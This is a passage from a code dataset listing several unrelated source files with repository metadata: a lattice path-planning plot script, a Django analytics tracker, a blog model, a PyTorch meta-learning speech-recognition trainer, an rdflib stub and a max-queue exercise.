return end_set
def generate_lattice(efficients):
end_set = sampling(longitudinal_num, lateral_num, lateral_step, longitudinal_step)
# print(end_set)
end_size = end_set.shape
# print("end_size:")
# print(end_size)
# 生成车辆起点到第一列采样点的图
for i in range(end_size[1]):
s, rho, thetaRho = cubic.Polynomial(start_SRho, end_set[0, i])
x = []
y = []
# print(s)
for j in range(len(s)):
tmpX, tmpY, tmpTheta = ftc.frenetToXY(s[j], rho[j], thetaRho[j], efficients)
x.append(tmpX)
y.append(tmpY)
# plt.scatter(end_set[0, i][0], end_set[0, i][1], color='b', s=2, alpha=0.8)
plt.plot(x, y, c='b', linewidth=0.2, alpha=1.0)
# 采样点之间的图
for i in range(end_size[0] - 1):
for j in range(end_size[1]):
# print([i, j])
for q in range(end_size[1]):
# mptg.test_optimize_trajectory(end_set[1, 0], end_set[0, 1])
s, rho, thetaRho = cubic.Polynomial(end_set[i, q], end_set[i + 1, j])
x = []
y = []
# print(s)
for q in range(len(s)):
tmpX, tmpY, tmpTheta = ftc.frenetToXY(s[q], rho[q], thetaRho[q], efficients)
x.append(tmpX)
y.append(tmpY)
# plt.scatter(end_set[i + 1, j][0], end_set[i + 1, j][1], color='b', s=2, alpha=0.8)
plt.plot(x, y, c='b', linewidth=0.1, alpha=0.80)
return None
def plot_arrow(x, y, yaw, length=2, width=0.1):
"""
arrow函数绘制箭头,表示搜索过程中选择的航向角
:param x:
:param y:
:param yaw:航向角
:param length:
:param width:参数值为浮点数,代表箭头尾部的宽度,默认值为0.001
:return:
length_includes_head:代表箭头整体长度是否包含箭头头部的长度,默认值为False
head_width:代表箭头头部的宽度,默认值为3*width,即尾部宽度的3倍
head_length:代表箭头头部的长度度,默认值为1.5*head_width,即头部宽度的1.5倍
shape:参数值为'full'、'left' 、'right',表示箭头的形状,默认值为'full'
overhang:代表箭头头部三角形底边与箭头尾部直接的夹角关系,通过该参数可改变箭头的形状。
默认值为0,即头部为三角形,当该值小于0时,头部为菱形,当值大于0时,头部为鱼尾状
"""
plt.arrow(x, y, length * math.cos(yaw), length * math.sin(yaw), head_length=1.5 * length, head_width=2 * width,
fc='lime', ec='lime')
return None
def plotGraph():
# plt.rcParams['font.sans-serif'] = ['Times New Roman'] # 如果要显示中文字体,则在此处设为:SimHei
# plt.rcParams['axes.unicode_minus'] = False # 显示负号
# # show multilane
# multiLane.curvePath()
# # 计算多车道环境的弧长参数曲线的系数
# efficients = multiLane.saveEfficients()
# 计算回环环境的弧长参数曲线的系数
efficients = cubicSpline.saveEfficients()
# show sampling path
generate_lattice(efficients)
if show_obstacle:
c = ['r', 'gold', 'darkorange']
for i in range(len(static_obs)):
tmpx, tmpy, tmptheta = ftc.frenetToXY(static_obs[-(i + 1)][0], static_obs[-(i + 1)][1], obstacleHeading,
efficients)
car.simVehicle([tmpx, tmpy], tmptheta, c[i], 0.8)
if showVehicleStart:
tmpx, tmpy, tmptheta = ftc.frenetToXY(start_SRho[0], start_SRho[1], obstacleHeading, efficients)
car.simVehicle([tmpx, tmpy], tmptheta, 'b', 0.8)
font1 = {'family': 'Times New Roman',
'weight': 'normal',
'size': 10,
}
plt.xlabel("x (m)", font1)
plt.ylabel('y (m)', font1)
# 设置坐标刻度值的大小以及刻度值的字体
plt.tick_params(labelsize=10)
# x = np.array([0.0, 10.0, 20.0, 30.0, 40.0, 50.0])
# x = np.array([0.0, 20.0, 40.0, 60.0, 80.0, 100.0])
# y = np.array([-2.0, -1, 0.0, 1.0, 2.0])
# y = np.array([-2.0, -1, 0.0, 1.0, 2.0])
# xgroup_labels = ['0.0', '20.0', '40.0', '60.0', '80.0', '100.0'] # x轴刻度的标识
# ygroup_labels = ['-2.0', '-1.0', '0.0', '1.0', '2.0'] # y轴刻度的标识
# plt.xticks(x, xgroup_labels, fontproperties='Times New Roman', fontsize=10) # 默认字体大小为10
# plt.yticks(y, ygroup_labels, fontproperties='Times New Roman', fontsize=10)
plt.xticks(fontproperties='Times New Roman', fontsize=10)
plt.yticks(fontproperties='Times New Roman', fontsize=10)
plt.xlim(30, 140)
plt.ylim(80, 130)
plt.savefig('../SimGraph/pathLatticeXY3_053002.tiff', dpi=600)
# center_line = plt.plot([0, 105], [0, 0], color='lime', linewidth=0.6, linestyle='-', label='reference line')
# plot_arrow(105, 0, 0)
# plt.legend(loc='upper right')
# plt.legend()
# 将文件保存至文件中并且画出图
# plt.savefig('/home/ming/桌面/PTPSim/SimGraph/pathLatticeXY5_30_15_26.svg')
def ToPathPlanner(efficients):
# show sampling path
generate_lattice(efficients)
if showVehicleStart:
tmpx, tmpy, tmptheta = ftc.frenetToXY(start_SRho[0], start_SRho[1], obstacleHeading, efficients)
car.simVehicle([tmpx, tmpy], tmptheta, 'b', 0.8)
if __name__ == '__main__':
# plt.style.use('ggplot')
plt.figure(figsize=(3.5, 3.5 * 0.62)) # 单位英寸, 3.5
plt.axes([0.2, 0.2, 0.7, 0.7])
plt.axis("equal")
plt.grid(linestyle="--", linewidth=0.5, alpha=1)
plotGraph()
plt.show()
|
[
"ming.ustb@outlook.com"
] |
ming.ustb@outlook.com
|
9fdf1744503ec788d735265bc226b7ba1e8701a8
|
ae7eea42299728df34c5652c52f1b341f449fcd4
|
/customerevents/tracker.py
|
96d4a4db925461f06a69eb395529bcf2a03d6c12
|
[] |
no_license
|
zbyte64/django-customerevents
|
27ef98c4785c021144cf9e343e52c0bd242884f9
|
d16e8f24b8a42cf332e9348b250ce4e9a11b57da
|
refs/heads/master
| 2020-05-30T04:14:30.240862
| 2014-12-10T19:35:41
| 2014-12-10T19:35:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,711
|
py
|
from threading import local
from .backends import get_backends
from .tasks import send_tracking_to_backend, send_tracking_to_backends
SESSION = local()
def get_tracker(request=None):
if hasattr(SESSION, 'tracker'):
if request:
if SESSION.tracker.request:
assert SESSION.tracker.request == request
else:
SESSION.tracker.set_request(request)
return SESSION.tracker
return set_tracker(request)
def set_tracker(request=None):
SESSION.tracker = Tracker(get_backends(), request=request)
return SESSION.tracker
def unset_tracker():
if hasattr(SESSION, 'tracker'):
delattr(SESSION, 'tracker')
class Tracker(object):
def __init__(self, backends, request=None):
self.backends = backends
self.identity = dict()
self.identity_id = None
self.aliases = set()
self.events = list()
self._closed = False
self.set_request(request)
def set_request(self, request):
self.request = request
self.request_meta = dict()
if self.request:
for key, value in request.META.items():
if isinstance(value, basestring):
self.request_meta[key] = value
def to_pystruct(self):
return {
'identity': self.identity_id,
'properties': self.identity,
'aliases': self.aliases,
'events': self.events,
'request_meta': self.request_meta,
}
def close(self):
self._closed = True
def _check_open(self):
return
assert self._closed is False, 'Tracker object is closed'
def has_data(self):
if not self.identity_id:
return False
return bool(self.aliases) or bool(self.events) or bool(self.identity)
def identify(self, id, properties=None):
self._check_open()
if self.identity_id is not None and id != self.identity_id:
self.alias(self.identity_id, id)
else:
self.identity_id = id
if properties:
self.identity.update(properties)
def set(self, key, value):
self._check_open()
self.identity[key] = value
def event(self, name, properties):
self._check_open()
self.events.append((name, properties))
def alias(self, from_id, to_id):
self._check_open()
assert self.identity_id == from_id
self.aliases.add(from_id)
self.identity_id = to_id
def flush(self):
self.close()
if not hasattr(self, 'bound_trackers'):
self.bound_trackers = list()
if self.identity_id:
for backend in self.backends.values():
self.bound_trackers.append(BoundTracking(self, backend))
elif self.events:
print 'Events found for no identity'
return [tracker for tracker in self.bound_trackers if not tracker.sent]
class BoundTracking(object):
def __init__(self, tracker, backend):
self.tracker = tracker
self.backend = backend
self.sent = False
def _check_sent(self):
assert self.sent is False, 'Tracker is already sent'
@property
def data(self):
return self.tracker.to_pystruct()
def render(self):
'''
Returns html/js for inclusion in a client facing page
'''
self._check_sent()
try:
ret = self.backend.render(self.data)
except NotImplementedError:
raise
else:
self.sent = True
return ret
def send(self):
'''
Directly notifies the backend of the tracked analytics
'''
self._check_sent()
self.sent = True
return self.backend.send(**self.data)
def async_send(self):
'''
Schedules tracking to be sent by a task worker
'''
self._check_sent()
self.sent = True
kwargs = self.tracker.to_pystruct()
kwargs['backend_name'] = self.backend.name
return send_tracking_to_backend.delay(**kwargs)
def identify(identity, _=None, **properties):
tracker = get_tracker()
return tracker.identify(identity, _ or properties)
def send_event(name, _=None, **properties):
tracker = get_tracker()
return tracker.event(name, _ or properties)
def flush():
tracker = get_tracker()
if not tracker.has_data():
return
bound_trackers = tracker.flush()
backend_names = [bt.backend.name for bt in bound_trackers]
kwargs = tracker.to_pystruct()
unset_tracker()
return send_tracking_to_backends.delay(backend_names, **kwargs)
|
[
"zbyte64@gmail.com"
] |
zbyte64@gmail.com
|
fcfa88a0ada1b0e76fa893918074a7025147c19c
|
bb29e732c2c5394dc80bee2e5f20958034ca2a91
|
/setup.py
|
0397a4914e5698920e0aa21759cf40e7bb8eaf26
|
[] |
no_license
|
chengjia63/srh_cnn
|
e9814520f167935817c6838390c06d121ab52b2b
|
89227b2d68d60c3938069d2b36514094da123f86
|
refs/heads/master
| 2020-12-12T00:09:19.221037
| 2020-02-18T06:54:32
| 2020-02-18T06:54:32
| 233,991,554
| 0
| 0
| null | 2020-01-15T03:37:12
| 2020-01-15T03:37:11
| null |
UTF-8
|
Python
| false
| false
| 325
|
py
|
from setuptools import setup, find_packages
setup(
name='srh-cnn',
install_requires=[
'setuptools>=41.0.0',
'numpy==1.18.1',
'matplotlib==3.1.2',
'scikit-learn==0.22.1',
'tensorflow-gpu',
'keras==2.3.1',
'opencv-python==4.1.2.30',
'Pillow==7'
]
)
|
[
"chengjia@umich.edu"
] |
chengjia@umich.edu
|
2d7149372e0ce6b3f231d6b52c452197548e012f
|
e0cc8f10d417fdf7870981808d775d41bb8cd2da
|
/blog/models.py
|
f848bccc4e16c3430b25e9b1b10ada0c85e0d13c
|
[] |
no_license
|
aman1100/iCoder
|
70f86eccc2783985c53b63c3517317ab7cfea355
|
a7f53b4ade3ee44dd75434214e8f16e8cfea20ef
|
refs/heads/master
| 2022-12-31T12:18:38.192297
| 2020-10-23T08:10:19
| 2020-10-23T08:10:19
| 297,904,421
| 1
| 2
| null | 2020-09-27T08:35:59
| 2020-09-23T08:31:14
|
Python
|
UTF-8
|
Python
| false
| false
| 400
|
py
|
from django.db import models
# Create your models here.
class Post(models.Model):
sno = models.AutoField(primary_key=True)
title = models.CharField(max_length=300)
content = models.TextField()
author = models.CharField(max_length=50)
slug = models.CharField(max_length=150)
timeStamp = models.DateTimeField( blank = True)
def __str__(self):
return self.title
|
[
"aman.chandna2000@gmail.com"
] |
aman.chandna2000@gmail.com
|
9536ad374c3bb724a992c0d37393e5ae7408b78c
|
fc07f14697ca7872b7e7d4f10af572d823de18d1
|
/trainer/asr/meta_trainer.py
|
6bf2e261aa15b6f7ca0b11ed376057b7ec643dc8
|
[
"MIT"
] |
permissive
|
LJQCN101/meta-transfer-learning
|
6955156fc484bfd5178c7e4968216cd7a8a51fec
|
1ed18e793c31b79a224a5334ed5a5b8a8ac3e71a
|
refs/heads/master
| 2022-11-23T12:22:32.677588
| 2020-07-30T16:39:54
| 2020-07-30T16:39:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,471
|
py
|
import time
import numpy as np
import torch
import logging
import sys
import threading
import time
from copy import deepcopy
from tqdm import tqdm
# from utils import constant
from collections import deque
from utils.functions import save_meta_model, save_discriminator, post_process
from utils.optimizer import NoamOpt
from utils.metrics import calculate_metrics, calculate_cer, calculate_wer, calculate_adversarial
from torch.autograd import Variable
class MetaTrainer():
"""
Trainer class
"""
def __init__(self):
logging.info("Meta Trainer is initialized")
def forward_one_batch(self, model, vocab, src, trg, src_percentages, src_lengths, trg_lengths, smoothing, loss_type, verbose=False, discriminator=None, accent_id=None):
if discriminator is None:
pred, gold, hyp = model(src, src_lengths, trg, verbose=False)
else:
enc_output = model.encode(src, src_lengths)
accent_pred = discriminator(torch.sum(enc_output, dim=1))
pred, gold, hyp = model.decode(enc_output, src_lengths, trg)
# calculate discriminator loss and encoder loss
disc_loss, enc_loss = calculate_adversarial(accent_pred, accent_id)
del enc_output, accent_pred
strs_golds, strs_hyps = [], []
for j in range(len(gold)):
ut_gold = gold[j]
strs_golds.append("".join([vocab.id2label[int(x)] for x in ut_gold]))
for j in range(len(hyp)):
ut_hyp = hyp[j]
strs_hyps.append("".join([vocab.id2label[int(x)] for x in ut_hyp]))
# handling the last batch
seq_length = pred.size(1)
sizes = src_percentages.mul_(int(seq_length)).int()
loss, _ = calculate_metrics(pred, gold, vocab.PAD_ID, input_lengths=sizes, target_lengths=trg_lengths, smoothing=smoothing, loss_type=loss_type)
if loss is None:
print("loss is None")
if loss.item() == float('Inf'):
logging.info("Found infinity loss, masking")
print("Found infinity loss, masking")
loss = torch.where(loss != loss, torch.zeros_like(loss), loss) # NaN masking
# if verbose:
# print(">PRED:", strs_hyps)
# print(">GOLD:", strs_golds)
total_cer, total_wer, total_char, total_word = 0, 0, 0, 0
for j in range(len(strs_hyps)):
strs_hyps[j] = post_process(strs_hyps[j], vocab.special_token_list)
strs_golds[j] = post_process(strs_golds[j], vocab.special_token_list)
cer = calculate_cer(strs_hyps[j].replace(' ', ''), strs_golds[j].replace(' ', ''))
wer = calculate_wer(strs_hyps[j], strs_golds[j])
total_cer += cer
total_wer += wer
total_char += len(strs_golds[j].replace(' ', ''))
total_word += len(strs_golds[j].split(" "))
if verbose:
print('Total CER', total_cer)
print('Total char', total_char)
print("PRED:", strs_hyps)
print("GOLD:", strs_golds, flush=True)
if discriminator is None:
return loss, total_cer, total_char
else:
return loss, total_cer, total_char, disc_loss, enc_loss
def get_lr(self, optimizer):
for param_group in optimizer.param_groups:
return param_group['lr']
def train(self, model, vocab, train_data_list, valid_data_list, loss_type, start_it, num_it, args, inner_opt=None, outer_opt=None, evaluate_every=1000, window_size=100, last_summary_every=1000, last_metrics=None, early_stop=10, cpu_state_dict=False, is_copy_grad=False, discriminator=None):
"""
Training
args:
model: Model object
train_data_list: DataLoader object of the training set
valid_data_list: DataLoader object of the valid set
start_it: start it (> 0 if you resume the process)
num_it: last epoch
last_metrics: (if resume)
"""
num_valid_it = args.num_meta_test
history = []
best_valid_val = 1000000000
smoothing = args.label_smoothing
early_stop_criteria, early_stop_val = early_stop.split(",")[0], int(early_stop.split(",")[1])
count_stop = 0
logging.info("name " + args.name)
total_time = 0
logging.info("TRAIN")
print("TRAIN")
model.train()
# define the optimizer
if inner_opt is None:
inner_opt = torch.optim.SGD(model.parameters(), lr=args.lr)
if outer_opt is None:
outer_opt = torch.optim.Adam(model.parameters(), lr=args.meta_lr)
if discriminator is not None:
disc_opt = torch.optim.Adam(discriminator.parameters(), lr=args.lr_disc)
last_sum_loss = deque(maxlen=window_size)
last_sum_cer = deque(maxlen=window_size)
last_sum_char = deque(maxlen=window_size)
# Define local variables
k_train, k_valid = args.k_train, args.k_valid
train_data_buffer = [[] for manifest_id in range(len(train_data_list))]
# Define batch loader function
def fetch_train_batch(train_data_list, k_train, k_valid, train_buffer):
for manifest_id in range(len(train_data_list)):
batch_data = train_data_list[manifest_id].sample(k_train, k_valid, manifest_id)
train_buffer[manifest_id].insert(0, batch_data)
return train_buffer
# Parallelly fetch next batch data from all manifest
prefetch = threading.Thread(target=fetch_train_batch,
args=([train_data_list, k_train, k_valid, train_data_buffer]))
prefetch.start()
beta = 1
beta_decay = 0.99997
it = start_it
while it < num_it:
# Wait until the next batch data is ready
prefetch.join()
# Parallelly fetch next batch data from all manifest
prefetch = threading.Thread(target=fetch_train_batch,
args=([train_data_list, k_train, k_valid, train_data_buffer]))
prefetch.start()
# Buffer for accumulating loss
batch_loss = 0
total_loss, total_cer = 0, 0
total_char = 0
total_disc_loss, total_enc_loss = 0, 0
# Local variables
weights_original = None
train_tmp_buffer = None
tr_inputs, tr_input_sizes, tr_percentages, tr_targets, tr_target_sizes = None, None, None, None, None
tr_loss, val_loss = None, None
disc_loss, enc_loss = None, None
try:
# Start execution time
start_time = time.time()
# Prepare model state dict (Based on experiment it doesn't yield any difference)
if cpu_state_dict:
model.cpu()
weights_original = deepcopy(model.state_dict())
model.cuda()
else:
weights_original = deepcopy(model.state_dict())
# Reinit outer opt
outer_opt.zero_grad()
if discriminator is not None:
disc_opt.zero_grad()
if is_copy_grad:
model.zero_copy_grad() # initialize copy_grad with 0
if discriminator is not None:
discriminator.zero_copy_grad()
# Pop buffer for all manifest first
# so we can maintain the same number in the buffer list if exception occur
train_tmp_buffer = []
for manifest_id in range(len(train_data_buffer)):
train_tmp_buffer.insert(0, train_data_buffer[manifest_id].pop())
# Start meta-training
# Loop over all tasks
for manifest_id in range(len(train_tmp_buffer)):
# Retrieve manifest data
tr_data, val_data = train_tmp_buffer.pop()
tr_inputs, tr_input_sizes, tr_percentages, tr_targets, tr_target_sizes = tr_data
val_inputs, val_input_sizes, val_percentages, val_targets, val_target_sizes = val_data
if args.cuda:
tr_inputs = tr_inputs.cuda()
tr_targets = tr_targets.cuda()
# Meta Train
model.train()
tr_loss, tr_cer, tr_num_char = self.forward_one_batch(model, vocab, tr_inputs, tr_targets, tr_percentages, tr_input_sizes, tr_target_sizes, smoothing, loss_type, verbose=False)
# Update train evaluation metric
total_cer += tr_cer
total_char += tr_num_char
# Delete unused references
del tr_inputs, tr_input_sizes, tr_percentages, tr_targets, tr_target_sizes, tr_data
# Inner Backward
inner_opt.zero_grad()
tr_loss = tr_loss / len(train_data_list)
tr_loss.backward()
# Delete unused references
del tr_loss
# Inner Update
if args.clip:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_norm)
inner_opt.step()
# Move validation to cuda
if args.cuda:
val_inputs = val_inputs.cuda()
val_targets = val_targets.cuda()
# Meta Validation
if discriminator is None:
val_loss, val_cer, val_num_char = self.forward_one_batch(model, vocab, val_inputs, val_targets, val_percentages, val_input_sizes, val_target_sizes, smoothing, loss_type)
else:
val_loss, val_cer, val_num_char, disc_loss, enc_loss = self.forward_one_batch(model, vocab, val_inputs, val_targets, val_percentages, val_input_sizes, val_target_sizes, smoothing, loss_type, discriminator=discriminator, accent_id=manifest_id)
# Delete unused references
del val_inputs, val_input_sizes, val_percentages, val_targets, val_target_sizes, val_data
# batch_loss += val_loss
total_loss += val_loss.item()
# adversarial training
if discriminator is not None:
if args.beta_decay:
beta = beta * beta_decay
disc_loss = beta * disc_loss
else:
disc_loss = 0.5 * disc_loss
total_disc_loss += disc_loss.item()
total_enc_loss += enc_loss.item()
val_loss = val_loss + enc_loss + disc_loss
# outer loop optimization
if is_copy_grad:
val_loss = val_loss / len(train_data_list)
val_loss.backward()
model.add_copy_grad() # add model grad to copy grad
if discriminator is not None:
discriminator.add_copy_grad() # add discriminator grad to copy grad
else:
batch_loss += val_loss / len(train_data_list)
# Delete unused references
del val_loss
if discriminator is not None:
del enc_loss, disc_loss
# Reset Weight
model.load_state_dict(weights_original)
# Delete copy weight
weights_original = None
# Outer loop optimization
if is_copy_grad:
model.from_copy_grad() # copy grad from copy_grad to model
if discriminator is not None: # copy grad from copy_grad to discriminator
discriminator.from_copy_grad()
disc_opt.step()
else:
batch_loss.backward()
del batch_loss
if args.clip:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_norm)
outer_opt.step()
# Record performance
last_sum_cer.append(total_cer)
last_sum_char.append(total_char)
last_sum_loss.append(total_loss/len(train_data_list))
# Record execution time
end_time = time.time()
diff_time = end_time - start_time
total_time += diff_time
if discriminator is None:
print("(Iteration {}) TRAIN LOSS:{:.4f} CER:{:.2f}% LR:{:.7f} TOTAL TIME:{:.7f}".format(
(it+1), total_loss/len(train_data_list), total_cer*100/total_char, self.get_lr(outer_opt), total_time))
logging.info("(Iteration {}) TRAIN LOSS:{:.4f} CER:{:.2f}% LR:{:.7f} TOTAL TIME:{:.7f}".format(
(it+1), total_loss/len(train_data_list), total_cer*100/total_char, self.get_lr(outer_opt), total_time))
else:
print("(Iteration {}) TRAIN LOSS:{:.4f} DISC LOSS:{:.4f} ENC LOSS:{:.4f} CER:{:.2f}% LR:{:.7f} TOTAL TIME:{:.7f}".format(
(it+1), total_loss/len(train_data_list), total_disc_loss/len(train_data_list), total_enc_loss/len(train_data_list), total_cer*100/total_char, self.get_lr(outer_opt), total_time))
logging.info("(Iteration {}) TRAIN LOSS:{:.4f} DISC LOSS:{:.4f} ENC LOSS:{:.4f} CER:{:.2f}% LR:{:.7f} TOTAL TIME:{:.7f}".format(
(it+1), total_loss/len(train_data_list), total_disc_loss/len(train_data_list), total_enc_loss/len(train_data_list), total_cer*100/total_char, self.get_lr(outer_opt), total_time))
if (it + 1) % last_summary_every == 0:
print("(Summary Iteration {} | MA {}) TRAIN LOSS:{:.4f} CER:{:.2f}%".format(
(it+1), window_size, sum(last_sum_loss)/len(last_sum_loss), sum(last_sum_cer)*100/sum(last_sum_char)), flush=True)
logging.info("(Summary Iteration {} | MA {}) TRAIN LOSS:{:.4f} CER:{:.2f}%".format(
(it+1), window_size, sum(last_sum_loss)/len(last_sum_loss), sum(last_sum_cer)*100/sum(last_sum_char)))
# Start meta-test
if (it + 1) % evaluate_every == 0:
print("")
logging.info("VALID")
# Define local variables
valid_data_buffer = [[] for manifest_id in range(len(valid_data_list))]
# Buffer for accumulating loss
valid_batch_loss = 0
valid_total_loss, valid_total_cer = 0, 0
valid_total_char = 0
valid_last_sum_loss = deque(maxlen=window_size)
valid_last_sum_cer = deque(maxlen=window_size)
valid_last_sum_char = deque(maxlen=window_size)
# Local variables
weights_original = None
valid_tmp_buffer = None
# Parallelly fetch next batch data from all manifest
prefetch = threading.Thread(target=fetch_train_batch,
args=([valid_data_list, k_train, k_valid, valid_data_buffer]))
prefetch.start()
valid_it = 0
while valid_it < num_valid_it:
# Wait until the next batch data is ready
prefetch.join()
# Parallelly fetch next batch data from all manifest
prefetch = threading.Thread(target=fetch_train_batch,
args=([valid_data_list, k_train, k_valid, valid_data_buffer]))
prefetch.start()
# Start execution time
start_time = time.time()
# Prepare model state dict (Based on experiment it doesn't yield any difference)
if cpu_state_dict:
model.cpu()
weights_original = deepcopy(model.state_dict())
model.cuda()
else:
weights_original = deepcopy(model.state_dict())
# Reinit outer opt
outer_opt.zero_grad()
if is_copy_grad:
model.zero_copy_grad() # initialize copy_grad with 0
# Pop buffer for all manifest first
# so we can maintain the same number in the buffer list if exception occur
valid_tmp_buffer = []
for manifest_id in range(len(valid_data_buffer)):
valid_tmp_buffer.insert(0, valid_data_buffer[manifest_id].pop())
# Start meta-testing
# Loop over all tasks
for manifest_id in range(len(valid_tmp_buffer)):
# Retrieve manifest data
tr_data, val_data = valid_tmp_buffer.pop()
tr_inputs, tr_input_sizes, tr_percentages, tr_targets, tr_target_sizes = tr_data
val_inputs, val_input_sizes, val_percentages, val_targets, val_target_sizes = val_data
if args.cuda:
tr_inputs = tr_inputs.cuda()
tr_targets = tr_targets.cuda()
# Meta Train
model.train()
tr_loss, tr_cer, tr_num_char = self.forward_one_batch(model, vocab, tr_inputs, tr_targets, tr_percentages, tr_input_sizes, tr_target_sizes, smoothing, loss_type, verbose=False)
# Update train evaluation metric
valid_total_cer += tr_cer
valid_total_char += tr_num_char
# Delete unused references
del tr_inputs, tr_input_sizes, tr_percentages, tr_targets, tr_target_sizes, tr_data
# Inner Backward
inner_opt.zero_grad()
tr_loss.backward()
# Delete unused references
del tr_loss
# Inner Update
if args.clip:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_norm)
inner_opt.step()
# Move validation to cuda
if args.cuda:
val_inputs = val_inputs.cuda()
val_targets = val_targets.cuda()
# Meta Validation
model.eval()
with torch.no_grad():
val_loss, val_cer, val_num_char = self.forward_one_batch(model, vocab, val_inputs, val_targets, val_percentages, val_input_sizes, val_target_sizes, smoothing, loss_type)
# Update train evaluation metric
valid_total_loss += val_loss.item()
valid_total_cer += tr_cer
valid_total_char += tr_num_char
# Delete unused references
del val_inputs, val_input_sizes, val_percentages, val_targets, val_target_sizes, val_data
del val_loss
# Reset Weight
model.load_state_dict(weights_original)
# Record performance
valid_last_sum_cer.append(valid_total_cer)
valid_last_sum_char.append(valid_total_char)
valid_last_sum_loss.append(valid_total_loss/len(valid_data_list))
# Record execution time
end_time = time.time()
diff_time = end_time - start_time
total_time += diff_time
valid_it += 1
print("(Summary Iteration {}) VALID LOSS:{:.4f} CER:{:.2f}% TOTAL TIME:{:.7f}".format(
(it+1), sum(valid_last_sum_loss)/len(valid_last_sum_loss), sum(valid_last_sum_cer)*100/sum(valid_last_sum_char), total_time), flush=True)
logging.info("(Summary Iteration {}) VALID LOSS:{:.4f} CER:{:.2f}% TOTAL TIME:{:.7f}".format(
(it+1), sum(valid_last_sum_loss)/len(valid_last_sum_loss), sum(valid_last_sum_cer)*100/sum(valid_last_sum_char), total_time))
metrics = {}
avg_valid_loss = sum(valid_last_sum_loss)/len(valid_last_sum_loss)
avg_valid_cer = sum(valid_last_sum_cer)*100/sum(valid_last_sum_char)
metrics["avg_valid_loss"] = sum(valid_last_sum_loss)/len(valid_last_sum_loss)
metrics["avg_valid_cer"] = sum(valid_last_sum_cer)*100/sum(valid_last_sum_char)
metrics["history"] = history
history.append(metrics)
if (it+1) % args.save_every == 0:
save_meta_model(model, vocab, (it+1), inner_opt, outer_opt, metrics, args, best_model=False)
if discriminator is not None:
save_discriminator(discriminator, (it+1), disc_opt, args, best_model=False)
# save the best model
early_stop_criteria, early_stop_val
if early_stop_criteria == "cer":
print("CRITERIA: CER")
if best_valid_val > avg_valid_cer:
count_stop = 0
best_valid_val = avg_valid_cer
save_meta_model(model, vocab, (it+1), inner_opt, outer_opt, metrics, args, best_model=True)
if discriminator is not None:
save_discriminator(discriminator, (it+1), disc_opt, args, best_model=True)
else:
print("count_stop:", count_stop)
count_stop += 1
else:
print("CRITERIA: LOSS")
if best_valid_val > avg_valid_loss:
count_stop = 0
best_valid_val = avg_valid_loss
save_meta_model(model, vocab, (it+1), inner_opt, outer_opt, metrics, args, best_model=True)
else:
count_stop += 1
print("count_stop:", count_stop)
if count_stop >= early_stop_val:
logging.info("EARLY STOP")
print("EARLY STOP\n")
break
# Increment iteration
it += 1
except KeyboardInterrupt:
raise
except Exception as e:
print('Error: {}, fetching new data...'.format(e), flush=True)
logging.info('Error: {}, fetching new data...'.format(e))
tr_inputs, tr_input_sizes, tr_percentages, tr_targets, tr_target_sizes = None, None, None, None, None
val_inputs, val_input_sizes, val_percentages, val_targets, val_target_sizes = None, None, None, None, None
tr_loss, val_loss = None, None
weights_original = None
batch_loss = 0
if discriminator is not None:
disc_loss, enc_loss = None, None
torch.cuda.empty_cache()
|
[
"gentaindrawinata@gmail.com"
] |
gentaindrawinata@gmail.com
|
afe3734274673293bc738c0825825646c0a6fddf
|
14ff5ca733ce92c14dd347e32c7ad262026c48cf
|
/typeshed/rdflib/tools/graphisomorphism.pyi
|
72650c110cb60606c52f67b9186a635184d78dd3
|
[
"Apache-2.0"
] |
permissive
|
common-workflow-language/cwlprov-py
|
6040bd1ea18fb58909bba9874f65e4edcc4ecd92
|
9b719c687484d3f888eb5f807ec3270e9081078a
|
refs/heads/main
| 2023-08-17T06:03:39.274209
| 2022-07-19T18:09:15
| 2022-07-19T18:21:13
| 148,144,870
| 1
| 2
|
Apache-2.0
| 2023-08-02T18:35:35
| 2018-09-10T11:27:31
|
Python
|
UTF-8
|
Python
| false
| false
| 590
|
pyi
|
from collections.abc import Generator
from rdflib import BNode as BNode, Graph as Graph
from typing import Any
class IsomorphicTestableGraph(Graph):
hash: Any
def __init__(self, **kargs) -> None: ...
def internal_hash(self): ...
def hashtriples(self) -> Generator[Any, None, None]: ...
def vhash(self, term, done: bool = ...): ...
def vhashtriples(self, term, done) -> Generator[Any, None, None]: ...
def vhashtriple(self, triple, term, done) -> Generator[Any, None, None]: ...
def __eq__(self, G): ...
def __ne__(self, G): ...
def main() -> None: ...
|
[
"1330696+mr-c@users.noreply.github.com"
] |
1330696+mr-c@users.noreply.github.com
|
4421f9722d3ddb7c18d3154c684901a423c77975
|
4cdc9ba739f90f6ac4bcd6f916ba194ada77d68c
|
/剑指offer/第四遍/59-2.队列的最大值.py
|
eab66a3f27e05f26ce4c57438bfeb7bdae84ad74
|
[] |
no_license
|
leilalu/algorithm
|
bee68690daf836cc5807c3112c2c9e6f63bc0a76
|
746d77e9bfbcb3877fefae9a915004b3bfbcc612
|
refs/heads/master
| 2020-09-30T15:56:28.224945
| 2020-05-30T03:28:39
| 2020-05-30T03:28:39
| 227,313,730
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,200
|
py
|
"""
请定义一个队列并实现函数 max_value 得到队列里的最大值,要求函数max_value、push_back 和 pop_front 的均摊时间复杂度都是O(1)。
若队列为空,pop_front 和 max_value 需要返回 -1
示例 1:
输入:
["MaxQueue","push_back","push_back","max_value","pop_front","max_value"]
[[],[1],[2],[],[],[]]
输出: [null,null,null,2,1,2]
示例 2:
输入:
["MaxQueue","pop_front","max_value"]
[[],[],[]]
输出: [null,-1,-1]
"""
class MaxQueue:
def __init__(self):
from collections import deque
self.queue = deque()
self.max_queue = deque()
def max_value(self) -> int:
if self.max_queue:
return self.max_queue[0]
return -1
def push_back(self, value: int) -> None:
self.queue.append(value)
while self.max_queue and value >= self.max_queue[-1]:
self.max_queue.pop()
self.max_queue.append(value)
def pop_front(self) -> int:
if self.max_queue and self.queue:
value = self.queue.popleft()
if value == self.max_queue[0]:
self.max_queue.popleft()
else:
value = -1
return value
|
[
"244492644@qq.com"
] |
244492644@qq.com
|
c7d7be82b06fe11ec65fb84ae4c2af426f64c544
|
bb1aec23bfc9accfc247382702a3d5bf297421d0
|
/djresthw/settings.py
|
3bd64b1d64a7acf4b99fbc75083a36237112be68
|
[] |
no_license
|
KenJi544/djrest
|
